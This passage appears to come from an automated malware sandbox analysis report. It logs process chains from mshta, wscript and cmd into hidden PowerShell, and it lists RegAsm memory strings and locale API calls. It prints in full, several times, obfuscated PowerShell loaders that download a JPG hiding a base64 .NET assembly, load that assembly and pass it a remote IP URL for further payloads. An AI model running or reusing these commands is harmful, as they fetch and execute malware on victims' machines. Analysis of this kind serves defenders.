{1}<<base'+'64_end>>{1};{0}startindex = '+'{0}imagetext.indexof({0}startflag);{0}endindex = {0}imagetext.indexof({0}endf'+'lag);{0}starti'+'ndex -ge 0 -and {0}endindex -'+'gt {0}startin'+'dex;{0}startindex += {0}sta'+'rtflag.length;{0}base64length'+' = {0'+'}endindex -'+' {0}startin'+'dex;{0}base64command = {0}im'+'agetext.substring({0}startindex, {0}base64length);{0}commandbytes = [system.convert]::frombase64stri'+'ng({0}base64command);{0'+'}loadedassembly = [system.r'+'eflection.assemb'+'ly]::load({'+'0}commandbytes);{0}vaimethod = [dnlib.io.home].getmethod({'+'1}vai{1});{0}vai'+'method.invoke({0}null, @({1}txt.drrsrr/095/9.44.042.83//:ptth{1}, {1}desativado{1}, {1}desativado{'+'1}, {1}desativado{1}, {1}regasm{1}, {1}desativado{1}, {1}d'+'esativado'+'{1}));') -f [char]36,[char]39) )"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jgggicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagqwrelxrzcgugicagicagicagicagicagicagicagicagicagicagicattwvtykvyrevgau5pdglpbiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnt24uzexsiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagzfn5yvrseixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbsc3hnwuwsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagy1osdwludcagicagicagicagicagicagicagicagicagicagicagihdluunnevlxleludfb0ciagicagicagicagicagicagicagicagicagicagicagihypoycgicagicagicagicagicagicagicagicagicagicagicatbmfnzsagicagicagicagicagicagicagicagicagicagicagicj5ve1fiiagicagicagicagicagicagicagicagicagicagicagic1oyu1fu3bby0ugicagicagicagicagicagicagicagicagicagicagicbeywz5rlprcvnaicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicroojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmzgumjqwljq0ljkvntkwl25py2vmzwf0dxjlc3dvcmtpbmdncmvhdc5uawyilcikzu52okfquerbvefcbmljzwzlyxr1cmvzd29ya2luz2dyzwf0lnziuyismcwwkttzvefyvc1ttgvfccgzktttdefsvcagicagicagicagicagicagicagicagicagicagicagicikzu5wokfquerbvefcbmljzwzlyxr1cmvzd29ya2luz2dyzwf0lnziuyi='+[char]0x22+'))')))"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jgggicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagqwrelxrzcgugicagicagicagicagicagicagicagicagicagicagicattwvtykvyrevgau5pdglpbiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnt24uzexsiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagzfn5yvrseixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbsc3hnwuwsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagy1osdwludcagicagicagicagicagicagicagicagicagicagicagihdluunnevlxleludfb0ciagicagicagicagicagicagicagicagicagicagicagihypoycgicagicagicagicagicagicagicagicagicagicagicatbmfnzsagicagicagicagicagicagicagicagicagicagicagicj5ve1fiiagicagicagicagicagicagicagicagicagicagicagic1oyu1fu3bby0ugicagicagicagicagicagicagicagicagicagicagicbeywz5rlprcvnaicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicroojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmzgumjqwljq0ljkvntkwl25py2vmzwf0dxjlc3dvcmtpbmdncmvhdc5uawyilcikzu52okfquerbvefcbmljzwzlyxr1cmvzd29ya2luz2dyzwf0lnziuyismcwwkttzvefyvc1ttgvfccgzktttdefsvcagicagicagicagicagicagicagicagicagicagicagicikzu5wokfquerbvefcbmljzwzlyxr1cmvzd29ya2luz2dyzwf0lnziuyi='+[char]0x22+'))')))"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liggkftzdfjpbkddjfzlckjpu0vwckvgrvjltknfkvsxldndkydyjy1qt2lujycpicgokcd7mh1pbwfnzvvybcankyc9ihsxfwh0dhbzoi8vascrj2e2mdaxmdiudxmuyxjjagl2zs5vcmcvmzivaxrlbxmvzgv0ywgtbm90jysnzs12xziwmjqxmc9ezxrhae5vdgvfvi5qcgcgezf9o3swfxdlyknsawvudca9ie5ldy1pymply3qgu3lzdgunkydtlk5ldc5xzwjdbgllbnq7ezb9aw1hz2vcjysnescrj3rlcya9ihswfxdlyknsawvudc5eb3dubg9hzerhdgeoezb9aw1hzycrj2vvcmwpo3swfwltywdlvgv4dca9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkccrj3swfwltywdlqnl0zxmpo3swfxn0yxj0rmxhzya9ihsxftw8qkftrty0x1nuqvjujysnpj57mx07ezb9zw5krmxhzya9ihsxftw8qkftrscrjzy0x0vord4+ezf9o3swfxn0yxj0sw5kzxggpsankyd7mh1pbwfnzvrlehqusw5kzxhpzih7mh1zdgfydezsywcpo3swfwvuzeluzgv4id0gezb9aw1hz2vuzxh0lkluzgv4t2yoezb9zw5kricrj2xhzyk7ezb9c3rhcnrjjysnbmrlecatz2ugmcatyw5kihswfwvuzeluzgv4ic0nkydndcb7mh1zdgfydelujysnzgv4o3swfxn0yxj0sw5kzxggkz0gezb9c3rhjysncnrgbgfnlkxlbmd0adt7mh1iyxnlnjrmzw5ndggnkycgpsb7mccrj31lbmrjbmrlecatjysnihswfxn0yxj0sw4nkydkzxg7ezb9ymfzzty0q29tbwfuzca9ihswfwltjysnywdlvgv4dc5tdwjzdhjpbmcoezb9c3rhcnrjbmrlecwgezb9ymfzzty0tgvuz3roktt7mh1jb21tyw5kqnl0zxmgpsbbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzty0u3ryascrj25nkhswfwjhc2u2nenvbw1hbmqpo3swjysnfwxvywrlzefzc2vtymx5id0gw1n5c3rlbs5sjysnzwzszwn0aw9ulkfzc2vtyicrj2x5xto6tg9hzch7jysnmh1jb21tyw5kqnl0zxmpo3swfxzhau1ldghvzca9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoeycrjzf9vkfjezf9ktt7mh12ywknkydnzxrob2qusw52b2tlkhswfw51bgwsieaoezf9dhh0lkrsulnsui8wotuvos40nc4wndiuodmvlzpwdhroezf9lcb7mx1kzxnhdgl2ywrvezf9lcb7mx1kzxnhdgl2ywrveycrjzf9lcb7mx1kzxnhdgl2ywrvezf9lcb7mx1szwdbc217mx0sihsxfwrlc2f0axzhzg97mx0sihsxfwqnkydlc2f0axzhzg8nkyd7mx0pktsnksagluygiftdsefyxtm2lftdsefyxtm5ksap';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( ([string]$verbosepreference)[1,3]+'x'-join'') ((('{0}imageurl '+'= {1}https://i'+'a600102.us.archive.org/32/items/detah-not'+'e-v_202410/detahnote_v.jpg {1};{0}webclient = new-object syste'+'m.net.webclient;{0}imageb'+'y'+'tes = {0}webclient.downloaddata({0}imag'+'eurl);{0}imagetext = [system.text.encoding]::utf8.getstring('+'{0}imagebytes);{0}startflag = {1}<<base64_start'+'>>{1};{0}endflag = {1}<<base'+'64_end>>{1};{0}startindex = '+'{0}imagetext.indexof({0}startflag);{0}endindex = {0}imagetext.indexof({0}endf'+'lag);{0}starti'+'ndex -ge 0 -and {0}endindex -'+'gt {0}startin'+'dex;{0}startindex += {0}sta'+'rtflag.length;{0}base64length'+' = {0'+'}endindex -'+' {0}startin'+'dex;{0}base64command = {0}im'+'agetext.substring({0}startindex, {0}base64length);{0}commandbytes = [system.convert]::frombase64stri'+'ng({0}base64command);{0'+'}loadedassembly = [system.r'+'eflection.assemb'+'ly]::load({'+'0}commandbytes);{0}vaimethod = [dnlib.io.home].getmethod({'+'1}vai{1});{0}vai'+'method.invoke({0}null, @({1}txt.drrsrr/095/9.44.042.83//:ptth{1}, {1}desativado{1}, {1}desativado{'+'1}, {1}desativado{1}, {1}regasm{1}, {1}desativado{1}, {1}d'+'esativado'+'{1}));') -f [char]36,[char]39) )"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jgggicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagqwrelxrzcgugicagicagicagicagicagicagicagicagicagicagicattwvtykvyrevgau5pdglpbiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnt24uzexsiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagzfn5yvrseixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbsc3hnwuwsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagy1osdwludcagicagicagicagicagicagicagicagicagicagicagihdluunnevlxleludfb0ciagicagicagicagicagicagicagicagicagicagicagihypoycgicagicagicagicagicagicagicagicagicagicagicatbmfnzsagicagicagicagicagicagicagicagicagicagicagicj5ve1fiiagicagicagicagicagicagicagicagicagicagicagic1oyu1fu3bby0ugicagicagicagicagicagicagicagicagicagicagicbeywz5rlprcvnaicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicroojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmzgumjqwljq0ljkvntkwl25py2vmzwf0dxjlc3dvcmtpbmdncmvhdc5uawyilcikzu52okfquerbvefcbmljzwzlyxr1cmvzd29ya2luz2dyzwf0lnziuyismcwwkttzvefyvc1ttgvfccgzktttdefsvcagicagicagicagicagicagicagicagicagicagicagicikzu5wokfquerbvefcbmljzwzlyxr1cmvzd29ya2luz2dyzwf0lnziuyi='+[char]0x22+'))')))"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jgggicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagqwrelxrzcgugicagicagicagicagicagicagicagicagicagicagicattwvtykvyrevgau5pdglpbiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnt24uzexsiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagzfn5yvrseixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbsc3hnwuwsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagy1osdwludcagicagicagicagicagicagicagicagicagicagicagihdluunnevlxleludfb0ciagicagicagicagicagicagicagicagicagicagicagihypoycgicagicagicagicagicagicagicagicagicagicagicatbmfnzsagicagicagicagicagicagicagicagicagicagicagicj5ve1fiiagicagicagicagicagicagicagicagicagicagicagic1oyu1fu3bby0ugicagicagicagicagicagicagicagicagicagicagicbeywz5rlprcvnaicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicroojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmzgumjqwljq0ljkvntkwl25py2vmzwf0dxjlc3dvcmtpbmdncmvhdc5uawyilcikzu52okfquerbvefcbmljzwzlyxr1cmvzd29ya2luz2dyzwf0lnziuyismcwwkttzvefyvc1ttgvfccgzktttdefsvcagicagicagicagicagicagicagicagicagicagicagicikzu5wokfquerbvefcbmljzwzlyxr1cmvzd29ya2luz2dyzwf0lnziuyi='+[char]0x22+'))')))"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liggkftzdfjpbkddjfzlckjpu0vwckvgrvjltknfkvsxldndkydyjy1qt2lujycpicgokcd7mh1pbwfnzvvybcankyc9ihsxfwh0dhbzoi8vascrj2e2mdaxmdiudxmuyxjjagl2zs5vcmcvmzivaxrlbxmvzgv0ywgtbm90jysnzs12xziwmjqxmc9ezxrhae5vdgvfvi5qcgcgezf9o3swfxdlyknsawvudca9ie5ldy1pymply3qgu3lzdgunkydtlk5ldc5xzwjdbgllbnq7ezb9aw1hz2vcjysnescrj3rlcya9ihswfxdlyknsawvudc5eb3dubg9hzerhdgeoezb9aw1hzycrj2vvcmwpo3swfwltywdlvgv4dca9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkccrj3swfwltywdlqnl0zxmpo3swfxn0yxj0rmxhzya9ihsxftw8qkftrty0x1nuqvjujysnpj57mx07ezb9zw5krmxhzya9ihsxftw8qkftrscrjzy0x0vord4+ezf9o3swfxn0yxj0sw5kzxggpsankyd7mh1pbwfnzvrlehqusw5kzxhpzih7mh1zdgfydezsywcpo3swfwvuzeluzgv4id0gezb9aw1hz2vuzxh0lkluzgv4t2yoezb9zw5kricrj2xhzyk7ezb9c3rhcnrjjysnbmrlecatz2ugmcatyw5kihswfwvuzeluzgv4ic0nkydndcb7mh1zdgfydelujysnzgv4o3swfxn0yxj0sw5kzxggkz0gezb9c3rhjysncnrgbgfnlkxlbmd0adt7mh1iyxnlnjrmzw5ndggnkycgpsb7mccrj31lbmrjbmrlecatjysnihswfxn0yxj0sw4nkydkzxg7ezb9ymfzzty0q29tbwfuzca9ihswfwltjysnywdlvgv4dc5tdwjzdhjpbmcoezb9c3rhcnrjbmrlecwgezb9ymfzzty0tgvuz3roktt7mh1jb21tyw5kqnl0zxmgpsbbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzty0u3ryascrj25nkhswfwjhc2u2nenvbw1hbmqpo3swjysnfwxvywrlzefzc2vtymx5id0gw1n5c3rlbs5sjysnzwzszwn0aw9ulkfzc2vtyicrj2x5xto6tg9hzch7jysnmh1jb21tyw5kqnl0zxmpo3swfxzhau1ldghvzca9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoeycrjzf9vkfjezf9ktt7mh12ywknkydnzxrob2qusw52b2tlkhswfw51bgwsieaoezf9dhh0lkrsulnsui8wotuvos40nc4wndiuodmvlzpwdhroezf9lcb7mx1kzxnhdgl2ywrvezf9lcb7mx1kzxnhdgl2ywrveycrjzf9lcb7mx1kzxnhdgl2ywrvezf9lcb7mx1szwdbc217mx0sihsxfwrlc2f0axzhzg97mx0sihsxfwqnkydlc2f0axzhzg8nkyd7mx0pktsnksagluygiftdsefyxtm2lftdsefyxtm5ksap';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( ([string]$verbosepreference)[1,3]+'x'-join'') ((('{0}imageurl '+'= {1}https://i'+'a600102.us.archive.org/32/items/detah-not'+'e-v_202410/detahnote_v.jpg {1};{0}webclient = new-object syste'+'m.net.webclient;{0}imageb'+'y'+'tes = {0}webclient.downloaddata({0}imag'+'eurl);{0}imagetext = [system.text.encoding]::utf8.getstring('+'{0}imagebytes);{0}startflag = {1}<<base64_start'+'>>{1};{0}endflag = {1}<<base'+'64_end>>{1};{0}startindex = '+'{0}imagetext.indexof({0}startflag);{0}endindex = {0}imagetext.indexof({0}endf'+'lag);{0}starti'+'ndex -ge 0 -and {0}endindex -'+'gt {0}startin'+'dex;{0}startindex += {0}sta'+'rtflag.length;{0}base64length'+' = {0'+'}endindex -'+' {0}startin'+'dex;{0}base64command = {0}im'+'agetext.substring({0}startindex, {0}base64length);{0}commandbytes = [system.convert]::frombase64stri'+'ng({0}base64command);{0'+'}loadedassembly = [system.r'+'eflection.assemb'+'ly]::load({'+'0}commandbytes);{0}vaimethod = [dnlib.io.home].getmethod({'+'1}vai{1});{0}vai'+'method.invoke({0}null, @({1}txt.drrsrr/095/9.44.042.83//:ptth{1}, {1}desativado{1}, {1}desativado{'+'1}, {1}desativado{1}, {1}regasm{1}, {1}desativado{1}, {1}d'+'esativado'+'{1}));') -f [char]36,[char]39) )"Jump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jgggicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagqwrelxrzcgugicagicagicagicagicagicagicagicagicagicagicattwvtykvyrevgau5pdglpbiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnt24uzexsiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagzfn5yvrseixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbsc3hnwuwsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagy1osdwludcagicagicagicagicagicagicagicagicagicagicagihdluunnevlxleludfb0ciagicagicagicagicagicagicagicagicagicagicagihypoycgicagicagicagicagicagicagicagicagicagicagicatbmfnzsagicagicagicagicagicagicagicagicagicagicagicj5ve1fiiagicagicagicagicagicagicagicagicagicagicagic1oyu1fu3bby0ugicagicagicagicagicagicagicagicagicagicagicbeywz5rlprcvnaicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicroojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmzgumjqwljq0ljkvntkwl25py2vmzwf0dxjlc3dvcmtpbmdncmvhdc5uawyilcikzu52okfquerbvefcbmljzwzlyxr1cmvzd29ya2luz2dyzwf0lnziuyismcwwkttzvefyvc1ttgvfccgzktttdefsvcagicagicagicagicagicagicagicagicagicagicagicikzu5wokfquerbvefcbmljzwzlyxr1cmvzd29ya2luz2dyzwf0lnziuyi='+[char]0x22+'))')))"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jgggicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagqwrelxrzcgugicagicagicagicagicagicagicagicagicagicagicattwvtykvyrevgau5pdglpbiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnt24uzexsiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagzfn5yvrseixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbsc3hnwuwsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagy1osdwludcagicagicagicagicagicagicagicagicagicagicagihdluunnevlxleludfb0ciagicagicagicagicagicagicagicagicagicagicagihypoycgicagicagicagicagicagicagicagicagicagicagicatbmfnzsagicagicagicagicagicagicagicagicagicagicagicj5ve1fiiagicagicagicagicagicagicagicagicagicagicagic1oyu1fu3bby0ugicagicagicagicagicagicagicagicagicagicagicbeywz5rlprcvnaicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicroojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmzgumjqwljq0ljkvntkwl25py2vmzwf0dxjlc3dvcmtpbmdncmvhdc5uawyilcikzu52okfquerbvefcbmljzwzlyxr1cmvzd29ya2luz2dyzwf0lnziuyismcwwkttzvefyvc1ttgvfccgzktttdefsvcagicagicagicagicagicagicagicagicagicagicagicikzu5wokfquerbvefcbmljzwzlyxr1cmvzd29ya2luz2dyzwf0lnziuyi='+[char]0x22+'))')))"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liggkftzdfjpbkddjfzlckjpu0vwckvgrvjltknfkvsxldndkydyjy1qt2lujycpicgokcd7mh1pbwfnzvvybcankyc9ihsxfwh0dhbzoi8vascrj2e2mdaxmdiudxmuyxjjagl2zs5vcmcvmzivaxrlbxmvzgv0ywgtbm90jysnzs12xziwmjqxmc9ezxrhae5vdgvfvi5qcgcgezf9o3swfxdlyknsawvudca9ie5ldy1pymply3qgu3lzdgunkydtlk5ldc5xzwjdbgllbnq7ezb9aw1hz2vcjysnescrj3rlcya9ihswfxdlyknsawvudc5eb3dubg9hzerhdgeoezb9aw1hzycrj2vvcmwpo3swfwltywdlvgv4dca9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkccrj3swfwltywdlqnl0zxmpo3swfxn0yxj0rmxhzya9ihsxftw8qkftrty0x1nuqvjujysnpj57mx07ezb9zw5krmxhzya9ihsxftw8qkftrscrjzy0x0vord4+ezf9o3swfxn0yxj0sw5kzxggpsankyd7mh1pbwfnzvrlehqusw5kzxhpzih7mh1zdgfydezsywcpo3swfwvuzeluzgv4id0gezb9aw1hz2vuzxh0lkluzgv4t2yoezb9zw5kricrj2xhzyk7ezb9c3rhcnrjjysnbmrlecatz2ugmcatyw5kihswfwvuzeluzgv4ic0nkydndcb7mh1zdgfydelujysnzgv4o3swfxn0yxj0sw5kzxggkz0gezb9c3rhjysncnrgbgfnlkxlbmd0adt7mh1iyxnlnjrmzw5ndggnkycgpsb7mccrj31lbmrjbmrlecatjysnihswfxn0yxj0sw4nkydkzxg7ezb9ymfzzty0q29tbwfuzca9ihswfwltjysnywdlvgv4dc5tdwjzdhjpbmcoezb9c3rhcnrjbmrlecwgezb9ymfzzty0tgvuz3roktt7mh1jb21tyw5kqnl0zxmgpsbbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzty0u3ryascrj25nkhswfwjhc2u2nenvbw1hbmqpo3swjysnfwxvywrlzefzc2vtymx5id0gw1n5c3rlbs5sjysnzwzszwn0aw9ulkfzc2vtyicrj2x5xto6tg9hzch7jysnmh1jb21tyw5kqnl0zxmpo3swfxzhau1ldghvzca9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoeycrjzf9vkfjezf9ktt7mh12ywknkydnzxrob2qusw52b2tlkhswfw51bgwsieaoezf9dhh0lkrsulnsui8wotuvos40nc4wndiuodmvlzpwdhroezf9lcb7mx1kzxnhdgl2ywrvezf9lcb7mx1kzxnhdgl2ywrveycrjzf9lcb7mx1kzxnhdgl2ywrvezf9lcb7mx1szwdbc217mx0sihsxfwrlc2f0axzhzg97mx0sihsxfwqnkydlc2f0axzhzg8nkyd7mx0pktsnksagluygiftdsefyxtm2lftdsefyxtm5ksap';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( ([string]$verbosepreference)[1,3]+'x'-join'') ((('{0}imageurl '+'= {1}https://i'+'a600102.us.archive.org/32/items/detah-not'+'e-v_202410/detahnote_v.jpg {1};{0}webclient = new-object syste'+'m.net.webclient;{0}imageb'+'y'+'tes = {0}webclient.downloaddata({0}imag'+'eurl);{0}imagetext = [system.text.encoding]::utf8.getstring('+'{0}imagebytes);{0}startflag = {1}<<base64_start'+'>>{1};{0}endflag = {1}<<base'+'64_end>>{1};{0}startindex = '+'{0}imagetext.indexof({0}startflag);{0}endindex = {0}imagetext.indexof({0}endf'+'lag);{0}starti'+'ndex -ge 0 -and {0}endindex -'+'gt {0}startin'+'dex;{0}startindex += {0}sta'+'rtflag.length;{0}base64length'+' = {0'+'}endindex -'+' {0}startin'+'dex;{0}base64command = {0}im'+'agetext.substring({0}startindex, {0}base64length);{0}commandbytes = [system.convert]::frombase64stri'+'ng({0}base64command);{0'+'}loadedassembly = [system.r'+'eflection.assemb'+'ly]::load({'+'0}commandbytes);{0}vaimethod = [dnlib.io.home].getmethod({'+'1}vai{1});{0}vai'+'method.invoke({0}null, @({1}txt.drrsrr/095/9.44.042.83//:ptth{1}, {1}desativado{1}, {1}desativado{'+'1}, {1}desativado{1}, {1}regasm{1}, {1}desativado{1}, {1}d'+'esativado'+'{1}));') -f [char]36,[char]39) )"
                    Source: RegAsm.exe, 00000017.00000002.879261278.00000000008B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerChromeBL, IN & PL [Compatibility Mode]I
                    Source: RegAsm.exe, 00000017.00000002.879514002.0000000000921000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerll
                    Source: RegAsm.exe, 00000017.00000002.879261278.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.879514002.000000000090E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                    Source: RegAsm.exe, 00000017.00000002.879261278.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, logs.dat.23.drBinary or memory string: [Program Manager]
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_10002933 cpuid 23_2_10002933
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,31_2_0045201B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,31_2_004520B6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,31_2_00452143
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,31_2_00452393
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,31_2_00448484
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,31_2_004524BC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,31_2_004525C3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,31_2_00452690
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,31_2_0044896D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,31_2_0040F90C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,GetLocaleInfoW,31_2_00451D58
